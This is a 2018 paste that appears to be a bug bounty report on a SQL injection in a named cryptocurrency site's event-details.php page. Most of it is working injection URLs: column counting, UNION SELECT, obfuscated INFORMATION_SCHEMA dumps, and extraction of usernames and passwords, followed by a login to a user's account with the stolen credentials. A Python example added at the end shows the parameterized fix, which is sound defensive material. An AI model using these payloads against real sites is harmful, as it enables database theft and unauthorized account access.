bounty.txt

a guest
Sep 19th, 2018
* bounty reward website https://amorcoin.io *
The bug is on the page event-details.php?event=8: the event parameter allows SQL commands to be run against the database.
The steps follow.

* Vulnerability test with a quote sign (')
This is the injection point.
Link:
https://amorcoin.io/event-details.php?event=8%27
If it is vulnerable, there will be an error in the page.
Proof:
https://prnt.sc/kwh41d

* Continue by calling the SQL command with an ORDER BY.
Link:
https://amorcoin.io/event-details.php?event=8' order by+7-- -+
The ORDER BY count is already known to go up to 7.
Proof:
https://prnt.sc/kwh7mq

* Next, the UNION ALL SELECT command; this command calls the database and reads its contents.
Link:
https://amorcoin.io/event-details.php?event=-8%27%20union%20all%20select+1,2,3,4,5,6,7--%20-+
Proof:
https://prnt.sc/kwh66j
Above, the number (3) shows up on the page; this is the number we will use to execute queries.

* We continue by enumerating the database and searching for a username and password.
Dump link to get the database name:
https://amorcoin.io/event-details.php?event=-8' union all select+1,2,database(),4,5,6,7-- -+
Found: amorcoin_acoin
Proof:
https://prnt.sc/kwh7di
Dump link to get the table names:
https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),4,5,6,7-- -+

Found:

Proof:
https://prnt.sc/kwh8r3

* Now we look at the columns of the "mlm_register" table to find the username and password.
Dump link:
https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f7265676973746572)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),4,5,6,7-- -+
Found:
11: username
12: user_fname
13: user_lname
14: user_password

Proof:
https://prnt.sc/kwhawi

Dump link:
https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(amorcoin_acoin.mlm_register)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,user_password,0x3c62723e))))x),4,5,6,7-- -+

Found:

Proof:
https://prnt.sc/kwhan2

* Now we try to log in.
Link:
https://amorcoin.io/login.php
Account: one of the username and password pairs found in the previous step.
It works... I logged in successfully.
Link:
https://amorcoin.io/profile.php?succ
Proof:
https://prnt.sc/kwhc3y

* Thanks a lot
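
The fix for the injection point reported above, as an added example (not code from the site or from the report's author): the report's first three probes are run against a concatenated query and against an allow-listed, parameterized one. The in-memory SQLite table `events`, its columns and both function names are constructed for illustration; the reported page is PHP and the report's payloads use MySQL syntax.

```python
import sqlite3

# Probes from the report, URL-decoded ('+' and %20 are spaces, %27 is a quote).
PROBES = [
    "8'",
    "8' order by 7-- - ",
    "-8' union all select 1,2,3,4,5,6,7-- - ",
]

def make_db():
    """Constructed stand-in for the events table (7 columns, as the probes imply)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, c2, title, c4, c5, c6, c7)")
    db.execute("INSERT INTO events VALUES (8, 'a', 'Launch event', 'b', 'c', 'd', 'e')")
    return db

def event_vulnerable(db, event):
    """Flawed pattern: the request parameter is concatenated into the SQL text."""
    sql = "SELECT * FROM events WHERE id='" + event + "'"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Echoing the database error is what confirms the injection point.
        return "SQL error: %s" % exc

def event_hardened(db, event):
    """Allow-list the id, then pass it as a bound parameter, never as SQL text."""
    if not (event.isascii() and event.isdigit() and len(event) <= 9):
        return None  # caller answers 404 without any database detail
    return db.execute("SELECT * FROM events WHERE id = ?", (int(event),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for probe in ["8"] + PROBES:
        print(repr(probe))
        print("  vulnerable:", event_vulnerable(db, probe))
        print("  hardened:  ", event_hardened(db, probe))
```

Either the allow-list or the bound parameter alone stops these probes; using both also keeps malformed ids from ever reaching the database.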